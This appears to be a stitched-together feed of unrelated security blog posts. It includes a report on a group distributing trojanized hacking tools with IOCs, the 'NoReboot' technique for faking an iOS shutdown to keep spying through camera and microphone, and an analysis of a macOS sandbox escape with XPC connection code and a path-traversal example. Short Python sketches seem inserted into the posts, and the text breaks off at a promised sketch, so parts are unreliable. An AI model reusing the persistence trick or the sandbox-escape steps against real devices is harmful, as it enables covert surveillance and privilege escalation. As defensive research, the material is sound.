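We also found a Reddit user named tuki1986 who, two months ago, had been continuously promoting the toolbase[.]co and zippyfiles[.]net sites.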

2022-01-11-20-41-21
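A year ago, this user was promoting the website bigwarez[.]net.

2022-01-11-20-58-43-1
The site’s history shows that it was also a tool download site, and that it is linked to several social media accounts.

2022-01-12-21-03-15
Twitter @Bigwarez2

2022-01-11-21-05-11
Facebook @software.download.free.mana

2022-01-11-21-06-54

This account currently promotes itools[.]digital, a download site for browser extensions.
2022-01-11-21-18-54

Facebook group @free.software.bigwarez

2022-01-11-21-14-23

LinkedIn - currently inaccessible
@free-software-1055261b9

tumblr @bigwarez

2022-01-11-21-12-50

Further analysis of tuki1986’s history revealed another website, blackos[.]net.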

2022-01-11-21-24-33

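This site is also a hacking-tool download site

2022-01-11-21-27-38

and threat intelligence platforms flag it as hosting backdoored software.

2022-01-12-01-33-08

Through this site we found a user named sadoutlook1992 who, since 2018, has been posting trojanized hacking tools on various hacking forums.

2022-01-12-01-39-59
2022-01-12-01-40-42
2022-01-12-01-41-27

In their most recent activity, the download link points to zippyfiles[.]net.

2022-01-12-01-43-26

From the malicious GitHub repository and the archive password, we know of a username “CarbonBlackz”. Searching for that string with a search engine reveals a user named “Carbonblackz” on the well-known data-leak site raidforums[.]com.

image_23

An account is likewise registered on a Russian-language underground forum. Neither of these two accounts has published any posts or replies, so they appear not to have been put into use yet.

image_24

They have also posted software download links on Vietnam’s largest forum: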

image_25

image_26

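Attribution Analysis

Checking the WHOIS information for these domains shows that the contact email for filesr[.]net is [email protected]

image_22

Looking up this email address leads to a 35-year-old individual who appears to be from Russia.

2022-01-12-00-40-11

Judging from the two IDs carbon1986 and tuki1986, 1986 is probably the birth year, which is consistent with an age of 35.

Based on the links between these domains, their behavior patterns, and the similar promotion methods, we believe these domains belong to the same group as the dnspy[.]net attackers.

2022-01-12-02-45-11

This is a carefully organized malicious group that has been active since at least October 2018. It registers large numbers of websites, offers trojanized hacking tools and cracked software for download, and promotes them on multiple social media platforms in order to infect hackers, security researchers, software developers, and other users. It then mines cryptocurrency, steals cryptocurrency, or steals data via RAT software.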

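Conclusion

Trojanized cracked software is nothing new, but security researchers are more likely to fall for such attacks: the sensitive behavior of some hacking and analysis tools is readily flagged by antivirus software, so some security researchers may disable their antivirus to avoid the annoying warnings.

Although most of the group’s malicious websites, GitHub repositories, and malware distribution links are now dead, security researchers and developers should remain vigilant. We recommend running cracked or leaked hacking tools in a virtual environment, and downloading development and office software from official sites or legitimate channels, preferably in licensed versions, to avoid unnecessary losses.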

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d
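A file hash like the one above can be checked locally with a few lines of Python. This is a minimal sketch: the function names are made up for illustration, and the only value taken from the IOC list is the MD5 itself.

```python
import hashlib

# MD5 of the trojanized dnSpy.dll, taken from the IOC list above.
KNOWN_BAD_MD5 = {"f00e0affede6e0a533fd0f4f6c71264d"}


def md5_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_known_bad(path):
    """True if the file's MD5 matches a hash from the IOC list."""
    return md5_of_file(path) in KNOWN_BAD_MD5
```

For example, `is_known_bad("dnSpy.dll")` could be run against a downloaded copy before it is ever loaded. A hash match only covers this exact build; a rebuilt sample would have a different MD5.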

  • ip
45.32.253.0

  • domain
zippyfiles.net
windows-software.net
filesr.net
coolmint.net
windows-software.co
dnspy.net
torfiles.net
combolist.cloud
toolbase.co
shortbase.net
blackos.net
bigwarez.net
buysixes.com
itools.digital
4api.net
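The domain list can be matched against proxy or DNS logs. The sketch below is one possible way to do it, not a tool from the original post: the helper names are hypothetical, and it treats any subdomain of a listed domain as a hit.

```python
# Domains copied from the IOC list above.
IOC_DOMAINS = {
    "zippyfiles.net", "windows-software.net", "filesr.net", "coolmint.net",
    "windows-software.co", "dnspy.net", "torfiles.net", "combolist.cloud",
    "toolbase.co", "shortbase.net", "blackos.net", "bigwarez.net",
    "buysixes.com", "itools.digital", "4api.net",
}


def refang(indicator):
    """Undo the [.] and [:] defanging used in threat reports."""
    return indicator.replace("[.]", ".").replace("[:]", ":").lower()


def matches_ioc(hostname):
    """True if the hostname is a listed domain or a subdomain of one."""
    labels = refang(hostname).rstrip(".").split(".")
    # Test the full name first, then each parent domain in turn.
    return any(".".join(labels[i:]) in IOC_DOMAINS for i in range(len(labels)))


for host in ("dnspy[.]net", "cdn.toolbase.co", "notdnspy.net"):
    print(host, matches_ioc(host))
```

Comparing whole labels rather than using a substring search keeps lookalike names such as notdnspy.net from matching.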

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to discoveries of advanced detection and response mechanisms. ZecOps is proudly researching scenarios of attacks and sharing the information publicly for the benefit of all the mobile defenders out there.

iOS persistence is presumed to be the hardest bug to find. The attack surface is somewhat limited and constantly analyzed by Apple’s security teams.

Creativity is a key element of the hacker’s mindset. Persistence can be hard if the attackers play by the rules. As you may have guessed already – attackers are not playing by the rules and everything is possible.

In part II of the Attacker’s Mindset blog we’ll go over the ultimate persistence bug: a bug that cannot be patched because it’s not exploiting any persistence bugs at all – only playing tricks with the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it’s still running. The “NoReboot” approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a “fake shutdown”. There is no user-interface or any button feedback until the user turns the phone back “on”.

To demonstrate this technique, we’ll show a remote microphone & camera being accessed after “turning off” the phone, and “persisting” when the phone returns to a “powered on” state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which among them is abusing our data and privacy. Our information is constantly being collected and uploaded.

This story by Dan Goodin describes iOS malware discovered in the wild. One of the sentences in the article says: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by pressing the Volume Down + Power buttons and dragging the slider.

Given that the iPhone has no internal fan and usually stays cool, it’s not trivial to tell whether our phones are running or not. For end-users, the most intuitive indicator that the phone is on is the feedback from the screen. We tap on the screen or click on the side button to wake up the screen.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.

In backboardd, we hide the spinning wheel animation, which automatically appears when SpringBoard stops running. The magic spell that does this is [[BKSDefaults localDefaults]setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it the device looks and feels as if it is not powered on, which is the perfect disguise for a fake power-off.

Example of SpringBoard responding to user interaction: it detects the long-press action and invokes Siri

Even though we disabled all physical feedback, the phone remains fully functional and can maintain an active internet connection. The malicious actor could remotely manipulate the phone in a blatant way without worrying about being caught, because the user is tricked into thinking that the phone is off, whether it was turned off by the victim or by malicious actors using “low battery” as an excuse.

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. The system boot animation with Apple’s logo can convince the end-user to believe that the phone has been turned off. 

When SpringBoard is not on duty, backboardd is in charge of the screen. The iPhone Wiki describes backboardd as follows:

Ref: https://www.theiphonewiki.com/wiki/Backboardd

“All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd relays not only touch events but also physical button click events.

backboardd logs the exact time when a button is pressed down and when it is released.

With the help of cycript, we noticed a way to intercept that event with Objective-C method hooking.

A _BKButtonEventRecord instance will be created and inserted into a global dictionary object BKEventSenderUsagePairDictionary.  We hook the insertion method when the user attempts to “turn on” the phone.

The file will unleash the SpringBoard and trigger a special code block in our injected dylib. That code block leverages local SSH access to gain root privileges and then executes /bin/launchctl reboot userspace. This exits all processes and restarts the system without touching the kernel. The kernel remains patched, so malicious code has no problem continuing to run after this kind of reboot.

The user will see the Apple Logo effect upon restarting. This is handled by backboardd as well. Upon launching the SpringBoard, the backboardd lets SpringBoard take over the screen.

From that point, the interactive UI will be presented to the user. Everything feels right as all processes have indeed been restarted. Non-persistent threats achieved “persistency” without persistence exploits.

Hijacking the Force Restart Event?

A user can perform a “force restart” by clicking rapidly on “Volume Up”, then “Volume Down”, then long press on the power button until the Apple logo appears.
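The gesture itself is easy to express as a rule over button press and release times, the same kind of timing data that backboardd logs. The sketch below only illustrates the sequence; the event format, the button names, and both thresholds are assumptions, not values taken from iOS.

```python
from dataclasses import dataclass


@dataclass
class Press:
    button: str  # hypothetical names: "volume_up", "volume_down", "power"
    down: float  # time the button went down, in seconds
    up: float    # time the button was released, in seconds


QUICK_PRESS_MAX = 0.5  # assumed upper bound for a "rapid" click
LONG_PRESS_MIN = 5.0   # assumed lower bound for the long power press


def is_force_restart(presses):
    """True if the last three presses look like the force-restart gesture."""
    if len(presses) < 3:
        return False
    first, second, third = presses[-3:]
    return (
        first.button == "volume_up"
        and first.up - first.down <= QUICK_PRESS_MAX
        and second.button == "volume_down"
        and second.up - second.down <= QUICK_PRESS_MAX
        and third.button == "power"
        and third.up - third.down >= LONG_PRESS_MIN
    )
```

A power press released after only two seconds would not satisfy the rule, which is exactly the situation a user ends up in if they let go of the button too early.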

We have not found an easy way to hijack the force restart event. This event is implemented at a much lower level. According to the post below, it is done at a hardware level. Following a brief search in the iOS kernel, we can confirm that we didn’t see what triggers the force-restart event. The good news is that it’s harder for malicious actors to disable force restart events, but at the same time end-users face a risk of data loss as the system does not have enough time to securely write data to disk in case of force-restart events.

Misleading Force Restart

Nevertheless, it is entirely possible for malicious actors to observe the user’s attempt to perform a force restart (via backboardd) and deliberately make the Apple logo appear a few seconds earlier, deceiving the user into releasing the button earlier than they were supposed to. In this case, the end-user did not successfully trigger a force restart. We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

In iOS 15, Apple introduced a new feature allowing users to track their phone even when it’s been turned off. Malware researcher @naehrdine wrote a technical analysis of this feature and shared her opinion on “Security and privacy impact”. We agree with her on “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag an OpenAI GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Analysis of a VMWare Guest-to-Host Escape from Pwn2Own 2017

This vulnerability was found by Keen Security Lab, who demonstrated it at Pwn2Own 2017. Unfortunately, because the bug was silently patched by VMWare in 12.5.3, no CVE number was assigned, even though the vulnerability leads to remote code execution. Summary The vulnerability affects the Drag n Drop functionality of VMWare Workstation Pro before 12.5.3. This feature allows users to copy files from the host to the guest. However, due to a few insecure backdoor calls over an RPC interface, a Use-After-Free is present.

Supervisor Mode Execution Prevention

Supervisor Mode Execution Prevention is a CPU security feature which aims to prevent execution of untrusted memory while operating at a greater privilege level. In short, it stops code running in “ring0” (kernelspace) from executing memory that belongs to “ring3” (userspace). History SMEP was first introduced in 2011 by Intel on the Ivy Bridge Architecture. It was designed in order to address classes of Local Privilege Escalation (LPE), sometimes also known as Escalation of Privilege (EoP), attacks.
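As a small illustration, not taken from the linked post: on x86, SMEP is switched on through bit 20 of the CR4 control register, and Linux lists the capability as the smep flag in /proc/cpuinfo. The helper names and sample values below are made up for the example.

```python
CR4_SMEP_BIT = 20  # SMEP enable flag is bit 20 of control register CR4


def smep_enabled(cr4_value):
    """True if the SMEP bit is set in a raw CR4 value."""
    return bool((cr4_value >> CR4_SMEP_BIT) & 1)


def cpu_advertises_smep(cpuinfo_text):
    """True if a /proc/cpuinfo-style text lists the smep CPU flag."""
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "flags":
            return "smep" in value.split()
    return False


# Sample inputs for illustration only.
print(smep_enabled(0x1406F0))  # bit 20 set
print(smep_enabled(0x0406F0))  # bit 20 clear
print(cpu_advertises_smep("flags\t\t: fpu vme smep smap"))
```

On a Linux machine, the second helper can be fed the contents of /proc/cpuinfo directly.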

PaX - structleak

I am rather fascinated with exploit mitigations, especially ones by PaX. When I first started out in security I came to learn of PaX quite quickly, and since moving into the binary exploitation space the desire to understand more about how these mitigations are created and how they work has greatly increased. In light of that, today I am going to look into “STRUCTLEAK”. Introduction STRUCTLEAK is a GCC plugin created by PaX team, their decision to make such a plugin was prompted by CVE-2013-2141 (more on this CVE shortly).

Setting up PwnDbg with Ghidra

25 September 2021 at 00:00
If you’re like me and more used to Windows tooling (even if you have Linux experience) it is a little difficult to set up some of this more complicated Rizin tooling. So, I thought I would make a quick guide about setting up Pwndbg with Ghidra. As a WinDbg user, despite having used gdb before, I find it has a lot of quirks. Quirks which are as easy to get used to as quirks that exist in WinDbg.

Automatic Reference Counting

19 September 2021 at 00:00
I was bored so I decided to make a blog post on what “Automatic Reference Counting” (ARC) is and more importantly how it can act as a mitigation for Use-After-Free vulnerabilities. As well as other heap-based memory management bugs such as memory leaks. Introduction Most of you will have probably heard of garbage collection, most likely in the context of Java. Someone might have said to you before “Java garbage collection is horrible”.

HackTheBox - Jeeves Writeup

19 September 2021 at 00:00
Getting Started This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges. Reverse Engineering The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call. printf("Hello, good sir!\nMay I have your name? "); gets(input_buffer); printf("Hello %s, hope you have a good day!

Analysis of CVE-2017-12561

In this post I am going to perform root-cause analysis of a bug reported by Steven Seeley in HP iMC 7.3 E0504P04, specifically in the “dbman” service. Steven found a Use-After-Free condition in opcode 10012. I was given this task as a challenge and I had a lot of fun. I was not totally comfortable with heap-type bugs so it was a really nice challenge to learn more about the heap.

BAE x BSides Chelt CTF

Introduction BAE hosted a CTF the day before BSides Cheltenham. I played with my friends. There was a crypto challenge which I saw a number of people struggling with. The challenge only got three solves in total, I was the first to solve it, so I thought I’d make a writeup of how I did it. The Challenge The challenge was reminiscent of the ECB penguin problem in the sense that we had two picture files in .

OSCP Experience

OSCP Experience At the time of writing I just passed my OSCP and I thought I would follow the trend and make a blog post about my experience with both the exam and the course. Disclaimer: this post is old. The OSCP has undergone many updates since I took it, please keep that in mind. PWK Experience I originally was going to purchase 60 days however, in the end I decided to purchase 30 days.

HackTheBox - Sunday Writeup

Introduction This is a writeup for the machine “Sunday” (10.10.10.76) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We’ll start off with our usual full port nmap scan to see what kinda’ stuff is running on the box, I did also run a UDP scan too like usual however again in this case nothing was running on UDP.

HackTheBox - Beep Writeup

Introduction This is a writeup for the machine “Beep” (10.10.10.7) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As always we start off with our full TCP port scan using NMAP - this box is running quite a lot of services but don’t let that scare you! We follow the same enumeration process so let’s not worry that it’s any different just because there are more ports!

HackTheBox - Bashed Writeup

Introduction This is a writeup for the machine “Bashed” (10.10.10.68) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We start off with our two nmap scans, TCP & UDP however, in this box’s case we only got information returned on TCP so we will only analyse the output for the TCP scan in this post.

HackTheBox - Cronos Writeup

Introduction This is a writeup for the machine “Cronos” (10.10.10.13) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP Let’s start off with our two nmap scans, a full TCP & a full UDP. In this case only our TCP scan returned any results so we’re only going to analyse the output of the TCP scan.

HackTheBox - Devel Writeup

Introduction This is a writeup for the machine “Devel” (10.10.10.5) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As usual we’re going to start off with our two nmap scans, a full TCP scan using nmap -sV -sC -p- 10.10.10.5 and nmap -sU -p- 10.10.10.5 in this case, we only returned ports open on TCP so we’re going to look at that now.

HackTheBox - Lame Writeup

Introduction This is a writeup for the machine “Lame” (10.10.10.3) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/lame.xml 10.10.10.3 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

HackTheBox - Legacy Writeup

Introduction This is a writeup for the machine “Legacy” (10.10.10.4) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/legacy.xml 10.10.10.4 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

Xorg LPE CVE 2018-14665

On October 25th 2018 a post was made on SecurityTracker disclosing CVE 2018-14665. The interesting thing is this CVE has two bugs in two different arguments. The first is a flaw in the -modulepath argument which could lead to arbitrary code execution. The second was a flaw in the -logfile argument which could allow arbitrary files to be deleted from the system. Both of these issues were caused by poor command line validation.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.

Background

At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service that runs as root and is used for only a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:

/System/Library/LaunchDaemons/com.apple.lsd.plist:

<key>MachServices</key>
	<dict>
		<key>com.apple.lsd.advertisingidentifiers</key>
		<true/>
		<key>com.apple.lsd.diagnostics</key>
		<true/>
		<key>com.apple.lsd.dissemination</key>
		<true/>
		<key>com.apple.lsd.mapdb</key>
		<true/>
	...
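To see which Mach service names a launchd configuration file registers, the MachServices dictionary can be read with Python’s plistlib. The plist below is a trimmed, hand-written stand-in for the real file: the Label value is an assumption, and only two of the service names from the excerpt above are included.

```python
import plistlib

# Hand-written sample in the shape of a launchd plist (not the real file).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.lsd</string>
    <key>MachServices</key>
    <dict>
        <key>com.apple.lsd.advertisingidentifiers</key>
        <true/>
        <key>com.apple.lsd.diagnostics</key>
        <true/>
    </dict>
</dict>
</plist>
"""


def mach_service_names(plist_bytes):
    """Return the sorted Mach service names registered by a launchd plist."""
    config = plistlib.loads(plist_bytes)
    return sorted(config.get("MachServices", {}))


print(mach_service_names(SAMPLE_PLIST))
```

Each returned name is what a client would pass to initWithMachServiceName: when connecting.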

Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.

Permissions

XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sandboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. To a non-sandboxed application, these entitlements are not interesting to steal because that application is not sandboxed in the first place. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable due to defense-in-depth measures which were ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.
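How a “must be a subdirectory” check falls to path traversal can be shown with a small Python sketch. This is not the service’s actual code, which is not shown here: the naive prefix comparison is an assumption about what such a check might look like, and the base directory and target path are chosen only for illustration.

```python
import posixpath

# Directory used for illustration; it also appears in the sandbox profile.
BASE = "/Library/Application Support/App Store"


def naive_is_inside(path, base=BASE):
    """String-prefix check that ignores '..' components (bypassable)."""
    return path.startswith(base.rstrip("/") + "/")


def normalized_is_inside(path, base=BASE):
    """Collapse '..' components before comparing against the base directory."""
    base = posixpath.normpath(base)
    resolved = posixpath.normpath(path)
    return posixpath.commonpath([resolved, base]) == base


# Hypothetical attacker-supplied path that climbs out of the base directory.
traversal = BASE + "/../../../tmp/evil.app"
print(naive_is_inside(traversal))       # the prefix check accepts it
print(normalized_is_inside(traversal))  # the normalized check rejects it
```

Note that normpath only collapses `..` textually; a robust check also has to deal with symbolic links, which this sketch does not attempt.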

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
// Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restrictions related to files and folders are:

(allow file-read* file-write*
    (require-all
        (vnode-type DIRECTORY)
        (require-any
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
    (require-all
        (vnode-type REGULAR-FILE)
        (require-any
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/com.apple.commerce.plist")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/com.apple.appstored")
    (subpath "/System/Library/Caches/OnDemandResources")
)

The intent of these rules is that this service can modify specific files in applications that are currently being downloaded from the App Store, that is, bundles with a .appdownload extension. Examples are adding a MASReceipt file and changing the icon.

The regexes here are the most interesting part, mainly because they are anchored neither on the left nor on the right. On the left this makes sense, as the full path could be unknown, but not anchoring the file regexes on the right (with $) is a mistake.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.
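The effect of the missing right-hand anchor can be illustrated with a small Python sketch. This assumes that Python's `re.search` behaves like the sandbox's regex matching for these simple patterns; the `allowed` helper, the example paths and the anchored variant are illustrative and not taken from the profile.
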